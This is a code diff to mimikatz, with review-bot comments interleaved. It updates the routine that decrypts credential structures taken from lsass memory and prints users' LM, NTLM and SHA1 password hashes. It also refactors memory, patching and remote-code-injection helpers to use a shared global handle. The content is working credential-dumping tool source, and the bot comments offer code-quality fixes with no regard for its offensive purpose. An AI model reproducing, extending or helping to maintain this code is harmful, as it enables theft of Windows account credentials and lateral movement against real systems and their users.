} MSV1_0_PRIMARY_HELPER, *PMSV1_0_PRIMARY_HELPER;
|
||||
|
||||
const MSV1_0_PRIMARY_HELPER * kuhl_m_sekurlsa_msv_helper();
|
||||
|
||||
typedef struct _RPCE_COMMON_TYPE_HEADER {
|
||||
UCHAR Version;
|
||||
UCHAR Endianness;
|
||||
|
@ -223,88 +223,62 @@ DECLARE_API(mimikatz)
|
||||
UNICODE_STRING uNull = {12, 14, L"(null)"};
|
||||
VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, PLUID luid, ULONG flags)
|
||||
{
|
||||
PUNICODE_STRING credentials, username = NULL, domain = NULL, password = NULL;
|
||||
PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds;
|
||||
PMSV1_0_PRIMARY_CREDENTIAL_10 pPrimaryCreds10;
|
||||
PUNICODE_STRING username = NULL, domain = NULL, password = NULL;
|
||||
PRPCE_CREDENTIAL_KEYCREDENTIAL pRpceCredentialKeyCreds;
|
||||
PKERB_HASHPASSWORD_6 pHashPassword;
|
||||
UNICODE_STRING buffer;
|
||||
PVOID base;
|
||||
DWORD type, i;
|
||||
BOOL isNull = FALSE;
|
||||
PBYTE msvCredentials;
|
||||
const MSV1_0_PRIMARY_HELPER * pMSVHelper;
|
||||
|
||||
if(mesCreds)
|
||||
{
|
||||
if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL)
|
||||
{
|
||||
type = flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK;
|
||||
credentials = (PUNICODE_STRING) mesCreds;
|
||||
if(credentials->Buffer)
|
||||
if(msvCredentials = (PBYTE) ((PUNICODE_STRING) mesCreds)->Buffer)
|
||||
{
|
||||
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
|
||||
kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(((PUNICODE_STRING) mesCreds)->Buffer, ((PUNICODE_STRING) mesCreds)->Length);
|
||||
kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(msvCredentials, ((PUNICODE_STRING) mesCreds)->Length);
|
||||
|
||||
switch(type)
|
||||
{
|
||||
case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY:
|
||||
pPrimaryCreds = (PMSV1_0_PRIMARY_CREDENTIAL) credentials->Buffer;
|
||||
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->UserName, FALSE);
|
||||
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->LogonDomainName, FALSE);
|
||||
|
||||
dprintf("\n\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCreds->UserName, &pPrimaryCreds->LogonDomainName);
|
||||
if(pPrimaryCreds->isLmOwfPassword)
|
||||
pMSVHelper = kuhl_m_sekurlsa_msv_helper();
|
||||
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(msvCredentials, (PUNICODE_STRING) (msvCredentials + pMSVHelper->offsetToLogonDomain), FALSE);
|
||||
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(msvCredentials, (PUNICODE_STRING) (msvCredentials + pMSVHelper->offsetToUserName), FALSE);
|
||||
dprintf("\n\t * Username : %wZ\n\t * Domain : %wZ", (PUNICODE_STRING) (msvCredentials + pMSVHelper->offsetToUserName), (PUNICODE_STRING) (msvCredentials + pMSVHelper->offsetToLogonDomain));
|
||||
if(!pMSVHelper->offsetToisIso || !*(PBOOLEAN) (msvCredentials + pMSVHelper->offsetToisIso))
|
||||
{
|
||||
dprintf("\n\t * LM : ");
|
||||
kull_m_string_dprintf_hex(pPrimaryCreds->LmOwfPassword, LM_NTLM_HASH_LENGTH, 0);
|
||||
}
|
||||
if(pPrimaryCreds->isNtOwfPassword)
|
||||
{
|
||||
dprintf("\n\t * NTLM : ");
|
||||
kull_m_string_dprintf_hex(pPrimaryCreds->NtOwfPassword, LM_NTLM_HASH_LENGTH, 0);
|
||||
}
|
||||
if(pPrimaryCreds->isShaOwPassword)
|
||||
{
|
||||
dprintf("\n\t * SHA1 : ");
|
||||
kull_m_string_dprintf_hex(pPrimaryCreds->ShaOwPassword, SHA_DIGEST_LENGTH, 0);
|
||||
}
|
||||
break;
|
||||
case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY_10:
|
||||
pPrimaryCreds10 = (PMSV1_0_PRIMARY_CREDENTIAL_10) credentials->Buffer;
|
||||
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds10, &pPrimaryCreds10->UserName, FALSE);
|
||||
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds10, &pPrimaryCreds10->LogonDomainName, FALSE);
|
||||
|
||||
dprintf("\n\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCreds10->UserName, &pPrimaryCreds10->LogonDomainName);
|
||||
dprintf("\n\t * Flags : I%02x/N%02x/L%02x/S%02x", pPrimaryCreds10->isIso, pPrimaryCreds10->isNtOwfPassword, pPrimaryCreds10->isLmOwfPassword, pPrimaryCreds10->isShaOwPassword);
|
||||
if(!pPrimaryCreds10->isIso)
|
||||
{
|
||||
if(pPrimaryCreds10->isLmOwfPassword)
|
||||
if(*(PBOOLEAN) (msvCredentials + pMSVHelper->offsetToisLmOwfPassword))
|
||||
{
|
||||
dprintf("\n\t * LM : ");
|
||||
kull_m_string_dprintf_hex(pPrimaryCreds10->LmOwfPassword, LM_NTLM_HASH_LENGTH, 0);
|
||||
kull_m_string_dprintf_hex(msvCredentials + pMSVHelper->offsetToLmOwfPassword, LM_NTLM_HASH_LENGTH, 0);
|
||||
}
|
||||
if(pPrimaryCreds10->isNtOwfPassword)
|
||||
if(*(PBOOLEAN) (msvCredentials + pMSVHelper->offsetToisNtOwfPassword))
|
||||
{
|
||||
dprintf("\n\t * NTLM : ");
|
||||
kull_m_string_dprintf_hex(pPrimaryCreds10->NtOwfPassword, LM_NTLM_HASH_LENGTH, 0);
|
||||
kull_m_string_dprintf_hex(msvCredentials + pMSVHelper->offsetToNtOwfPassword, LM_NTLM_HASH_LENGTH, 0);
|
||||
}
|
||||
if(pPrimaryCreds10->isShaOwPassword)
|
||||
if(*(PBOOLEAN) (msvCredentials + pMSVHelper->offsetToisShaOwPassword))
|
||||
{
|
||||
dprintf("\n\t * SHA1 : ");
|
||||
kull_m_string_dprintf_hex(pPrimaryCreds10->ShaOwPassword, SHA_DIGEST_LENGTH, 0);
|
||||
kull_m_string_dprintf_hex(msvCredentials + pMSVHelper->offsetToShaOwPassword, SHA_DIGEST_LENGTH, 0);
|
||||
}
|
||||
}
|
||||
else
|
||||
kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) ((PBYTE) pPrimaryCreds10 + FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword) + sizeof(USHORT)));
|
||||
else kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) (msvCredentials + pMSVHelper->offsetToIso + sizeof(USHORT)));
|
||||
break;
|
||||
case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY:
|
||||
pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer;
|
||||
pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) msvCredentials;
|
||||
base = (PBYTE) pRpceCredentialKeyCreds + sizeof(RPCE_CREDENTIAL_KEYCREDENTIAL) + (pRpceCredentialKeyCreds->unk0 - 1) * sizeof(MARSHALL_KEY);
|
||||
for (i = 0; i < pRpceCredentialKeyCreds->unk0; i++)
|
||||
kuhl_m_sekurlsa_genericKeyOutput(&pRpceCredentialKeyCreds->key[i], &base);
|
||||
break;
|
||||
default:
|
||||
dprintf("\n\t * Raw data : ");
|
||||
kull_m_string_dprintf_hex(credentials->Buffer, credentials->Length, 1);
|
||||
kull_m_string_dprintf_hex(msvCredentials, ((PUNICODE_STRING) mesCreds)->Length, 1);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
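Review bot: The isolated-credential branch now computes the blob as `msvCredentials + pMSVHelper->offsetToIso + sizeof(USHORT)`; the old code spelled the same skip as `FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword) + sizeof(USHORT)`, and in neither form is it said what the leading USHORT is (presumably a length word ahead of the `LSAISO_DATA_BLOB` — confirm). A comment such as `/* offsetToIso points at a USHORT header preceding the LSAISO_DATA_BLOB — confirm */` would spare the next reader a dig. For the pre-Windows-10 row `offsetToisIso` is 0, so the `else` arm is unreachable there by construction of the table, which is worth one line at the `if(!pMSVHelper->offsetToisIso || ...)` test.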
@ -16,8 +16,7 @@ USHORT NtBuildNumber;
|
||||
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL 0x08000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY 0x01000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY_10 0x02000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY 0x03000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY 0x02000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK 0x07000000
|
||||
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10 0x00100000
|
||||
@ -94,7 +93,8 @@ typedef struct _PVK_FILE_HDR {
|
||||
#define KULL_M_WIN_BUILD_7 7600
|
||||
#define KULL_M_WIN_BUILD_8 9200
|
||||
#define KULL_M_WIN_BUILD_BLUE 9600
|
||||
#define KULL_M_WIN_BUILD_10 9800
|
||||
#define KULL_M_WIN_BUILD_10_1507 10240
|
||||
#define KULL_M_WIN_BUILD_10_1511 10586
|
||||
|
||||
#define KULL_M_WIN_MIN_BUILD_XP 2500
|
||||
#define KULL_M_WIN_MIN_BUILD_2K3 3000
|
||||
|
@ -51,8 +51,7 @@ int wmain(int argc, wchar_t *argv[])
|
||||
BOOL kuhl_m_sekurlsa_utils_love_search(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION mi, PKULL_M_MINI_PATTERN pa, PVOID * genericPtr)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, mi->DllBase.hMemory}, aLocalMemory = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, mi->DllBase.hMemory}, aLocalMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_SEARCH sMemory = {{{mi->DllBase.address, mi->DllBase.hMemory}, mi->SizeOfImage}, NULL};
|
||||
aLocalMemory.address = pa->Pattern;
|
||||
if(kull_m_memory_search(&aLocalMemory, pa->Length, &sMemory, FALSE))
|
||||
@ -89,8 +88,7 @@ void mimilove_lsasrv(PKULL_M_MEMORY_HANDLE hMemory)
|
||||
KULL_M_MINI_PATTERN paLsasrv = {sizeof(PTRN_W2K_LogonSessionTable), PTRN_W2K_LogonSessionTable, -9};
|
||||
PLIST_ENTRY LogonSessionTable = NULL;
|
||||
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION miLsasrv;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, hMemory}, aLocalMemory = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, hMemory}, aLocalMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
PVOID baseTable, base;
|
||||
KIWI_MSV1_0_LOGON_SESSION_TABLE_50 table;
|
||||
KIWI_MSV1_0_LIST_50 list;
|
||||
@ -271,8 +269,7 @@ void mimilove_kerberos(PKULL_M_MEMORY_HANDLE hMemory)
|
||||
KULL_M_MINI_PATTERN paKerberos = {sizeof(PTRN_W2K_KerbLogonSessionList), PTRN_W2K_KerbLogonSessionList, -8};
|
||||
PLIST_ENTRY KerbLogonSessionList = NULL;
|
||||
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION miKerberos;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, hMemory}, aLocalMemory = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, hMemory}, aLocalMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
PVOID base;
|
||||
BYTE hash;
|
||||
KIWI_KERBEROS_LOGON_SESSION_50 session;
|
||||
|
@ -5,6 +5,8 @@
|
||||
*/
|
||||
#include "kull_m_memory.h"
|
||||
|
||||
KULL_M_MEMORY_HANDLE KULL_M_MEMORY_GLOBAL_OWN_HANDLE = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
|
||||
BOOL kull_m_memory_open(IN KULL_M_MEMORY_TYPE Type, IN HANDLE hAny, OUT PKULL_M_MEMORY_HANDLE *hMemory)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
@ -86,8 +88,7 @@ BOOL kull_m_memory_copy(OUT PKULL_M_MEMORY_ADDRESS Destination, IN PKULL_M_MEMOR
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
BOOL bufferMeFirst = FALSE;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {NULL, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
DWORD nbReadWrite;
|
||||
|
||||
switch(Destination->hMemory->type)
|
||||
@ -169,8 +170,7 @@ BOOL kull_m_memory_copy(OUT PKULL_M_MEMORY_ADDRESS Destination, IN PKULL_M_MEMOR
|
||||
BOOL kull_m_memory_search(IN PKULL_M_MEMORY_ADDRESS Pattern, IN SIZE_T Length, IN PKULL_M_MEMORY_SEARCH Search, IN BOOL bufferMeFirst)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_SEARCH sBuffer = {{{NULL, &hBuffer}, Search->kull_m_memoryRange.size}, NULL};
|
||||
KULL_M_MEMORY_SEARCH sBuffer = {{{NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, Search->kull_m_memoryRange.size}, NULL};
|
||||
PBYTE CurrentPtr;
|
||||
PBYTE limite = (PBYTE) Search->kull_m_memoryRange.kull_m_memoryAdress.address + Search->kull_m_memoryRange.size;
|
||||
|
||||
@ -323,8 +323,7 @@ BOOL kull_m_memory_protect(IN PKULL_M_MEMORY_ADDRESS Address, IN SIZE_T dwSize,
|
||||
BOOL kull_m_memory_equal(IN PKULL_M_MEMORY_ADDRESS Address1, IN PKULL_M_MEMORY_ADDRESS Address2, IN SIZE_T Lenght)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {NULL, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
switch(Address1->hMemory->type)
|
||||
{
|
||||
case KULL_M_MEMORY_TYPE_OWN:
|
||||
|
@ -48,6 +48,7 @@ typedef struct _KULL_M_MEMORY_HANDLE {
|
||||
PKULL_M_MEMORY_HANDLE_KERNEL pHandleDriver;
|
||||
};
|
||||
} KULL_M_MEMORY_HANDLE, *PKULL_M_MEMORY_HANDLE;
|
||||
KULL_M_MEMORY_HANDLE KULL_M_MEMORY_GLOBAL_OWN_HANDLE;
|
||||
|
||||
typedef struct _KULL_M_MEMORY_ADDRESS {
|
||||
LPVOID address;
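Review bot: `KULL_M_MEMORY_HANDLE KULL_M_MEMORY_GLOBAL_OWN_HANDLE;` is placed in the header without `extern`, so every translation unit that includes kull_m_memory.h carries its own tentative definition alongside the initialised one in kull_m_memory.c; MSVC's C front end merges these as common symbols, but toolchains that default to `-fno-common` reject the duplicate, and a header should only declare the object anyway. Change the line to `extern KULL_M_MEMORY_HANDLE KULL_M_MEMORY_GLOBAL_OWN_HANDLE;` and keep the single definition in the .c file. Since the object is now process-wide and handed to every caller through a non-const pointer, a short comment stating that it is a read-only `KULL_M_MEMORY_TYPE_OWN` handle that must never be passed to whatever releases handles would help — presumably kull_m_memory_close, which is outside this hunk. The `_KULL_M_MEMORY_HANDLE` struct this hunk closes begins outside the hunk.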
|
||||
|
@ -8,9 +8,8 @@
|
||||
BOOL kull_m_patch(PKULL_M_MEMORY_SEARCH sMemory, PKULL_M_MEMORY_ADDRESS pPattern, SIZE_T szPattern, PKULL_M_MEMORY_ADDRESS pPatch, SIZE_T szPatch, LONG offsetOfPatch, PKULL_M_PATCH_CALLBACK pCallBackBeforeRestore, int argc, wchar_t * args[], NTSTATUS * pRetCallBack)
|
||||
{
|
||||
BOOL result = FALSE, resultBackup = !pCallBackBeforeRestore, resultProtect = TRUE;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS destination = {NULL, sMemory->kull_m_memoryRange.kull_m_memoryAdress.hMemory};
|
||||
KULL_M_MEMORY_ADDRESS backup = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS backup = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
MEMORY_BASIC_INFORMATION readInfos;
|
||||
NTSTATUS status;
|
||||
DWORD flags, oldProtect = 0, tempProtect = 0;
|
||||
@ -78,12 +77,11 @@ BOOL kull_m_patch_genericProcessOrServiceFromBuild(PKULL_M_PATCH_GENERIC generic
|
||||
BOOL result = FALSE;
|
||||
SERVICE_STATUS_PROCESS ServiceStatusProcess;
|
||||
PKULL_M_MEMORY_HANDLE hMemory;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION iModule;
|
||||
HANDLE hProcess;
|
||||
KULL_M_MEMORY_ADDRESS
|
||||
aPatternMemory = {NULL, &hLocalMemory},
|
||||
aPatchMemory = {NULL, &hLocalMemory};
|
||||
aPatternMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE},
|
||||
aPatchMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_SEARCH sMemory;
|
||||
|
||||
PKULL_M_PATCH_GENERIC currenReferences;
|
||||
|
@ -70,8 +70,7 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
|
||||
PEB_F32 Peb32; PEB_LDR_DATA_F32 LdrData32; LDR_DATA_TABLE_ENTRY_F32 LdrEntry32;
|
||||
#endif
|
||||
ULONG i;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {NULL, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_ADDRESS aProcess= {NULL, memory};
|
||||
PBYTE aLire, fin;
|
||||
PWCHAR moduleNameW;
|
||||
@ -346,8 +345,7 @@ BOOL kull_m_process_peb(PKULL_M_MEMORY_HANDLE memory, PPEB pPeb, BOOL isWOW)
|
||||
BOOL status = FALSE;
|
||||
PROCESS_BASIC_INFORMATION processInformations;
|
||||
HANDLE hProcess = (memory->type == KULL_M_MEMORY_TYPE_PROCESS) ? memory->pHandleProcess->hProcess : GetCurrentProcess();
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {pPeb, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {pPeb, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_ADDRESS aProcess= {NULL, memory};
|
||||
PROCESSINFOCLASS info;
|
||||
ULONG szPeb, szBuffer, szInfos;
|
||||
@ -398,8 +396,7 @@ BOOL kull_m_process_ntheaders(PKULL_M_MEMORY_ADDRESS pBase, PIMAGE_NT_HEADERS *
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
IMAGE_DOS_HEADER headerImageDos;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {&headerImageDos, &hBuffer}, aRealNtHeaders = {NULL, &hBuffer}, aProcess= {NULL, pBase->hMemory};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {&headerImageDos, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aRealNtHeaders = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aProcess= {NULL, pBase->hMemory};
|
||||
DWORD size;
|
||||
|
||||
if(kull_m_memory_copy(&aBuffer, pBase, sizeof(IMAGE_DOS_HEADER)) && headerImageDos.e_magic == IMAGE_DOS_SIGNATURE)
|
||||
@ -429,8 +426,7 @@ BOOL kull_m_process_ntheaders(PKULL_M_MEMORY_ADDRESS pBase, PIMAGE_NT_HEADERS *
|
||||
BOOL kull_m_process_datadirectory(PKULL_M_MEMORY_ADDRESS pBase, DWORD entry, PDWORD pRva, PDWORD pSize, PWORD pMachine, PVOID *pData)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {NULL, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_ADDRESS aProcess= *pBase;
|
||||
|
||||
DWORD rva, size;
|
||||
@ -566,8 +562,7 @@ PSTR kull_m_process_getImportNameWithoutEnd(PKULL_M_MEMORY_ADDRESS base)
|
||||
{
|
||||
CHAR sEnd = '\0';
|
||||
SIZE_T size;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aStringBuffer = {NULL, &hBuffer}, aNullBuffer = {&sEnd, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aStringBuffer = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aNullBuffer = {&sEnd, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_SEARCH sMemory = {{{base->address, base->hMemory}, MAX_PATH}, NULL};
|
||||
|
||||
if(kull_m_memory_search(&aNullBuffer, sizeof(sEnd), &sMemory, FALSE))
|
||||
@ -582,12 +577,11 @@ PSTR kull_m_process_getImportNameWithoutEnd(PKULL_M_MEMORY_ADDRESS base)
|
||||
|
||||
NTSTATUS kull_m_process_getImportedEntryInformations(PKULL_M_MEMORY_ADDRESS address, PKULL_M_IMPORTED_ENTRY_ENUM_CALLBACK callBack, PVOID pvArg)
|
||||
{
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
PVOID pLocalBuffer;
|
||||
PIMAGE_IMPORT_DESCRIPTOR pImportDir;
|
||||
ULONG sizeThunk;
|
||||
ULONGLONG OriginalFirstThunk, FirstThunk, ordinalPattern;
|
||||
KULL_M_MEMORY_ADDRESS aOriginalFirstThunk = {&OriginalFirstThunk, &hBuffer}, aFirstThunk = {&FirstThunk, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aOriginalFirstThunk = {&OriginalFirstThunk, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aFirstThunk = {&FirstThunk, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_ADDRESS aProcOriginalFirstThunk = {NULL, address->hMemory}, aProcName = {NULL, address->hMemory};
|
||||
KULL_M_PROCESS_IMPORTED_ENTRY importedEntry;
|
||||
BOOL continueCallback = TRUE;
|
||||
|
@ -26,8 +26,7 @@ BOOL kull_m_remotelib_create(PKULL_M_MEMORY_ADDRESS aRemoteFunc, PREMOTE_LIB_INP
|
||||
BOOL success = FALSE;
|
||||
NTSTATUS status;
|
||||
HANDLE hThread;
|
||||
KULL_M_MEMORY_HANDLE hLocalBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aRemoteData = {NULL, aRemoteFunc->hMemory}, aSuppData = {NULL, aRemoteFunc->hMemory}, aLocalAddr = {NULL, &hLocalBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aRemoteData = {NULL, aRemoteFunc->hMemory}, aSuppData = {NULL, aRemoteFunc->hMemory}, aLocalAddr = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
PREMOTE_LIB_DATA data;
|
||||
REMOTE_LIB_OUTPUT_DATA oData;
|
||||
MIMIDRV_THREAD_INFO drvInfo = {(PTHREAD_START_ROUTINE) aRemoteFunc->address, NULL};
|
||||
@ -170,8 +169,7 @@ BOOL kull_m_remotelib_CreateRemoteCodeWitthPatternReplace(PKULL_M_MEMORY_HANDLE
|
||||
{
|
||||
BOOL success = FALSE;
|
||||
DWORD i, j;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalAddr = {(LPVOID) Buffer, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLocalAddr = {(LPVOID) Buffer, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
|
||||
DestAddress->hMemory = hProcess;
|
||||
DestAddress->address = NULL;
|
||||
|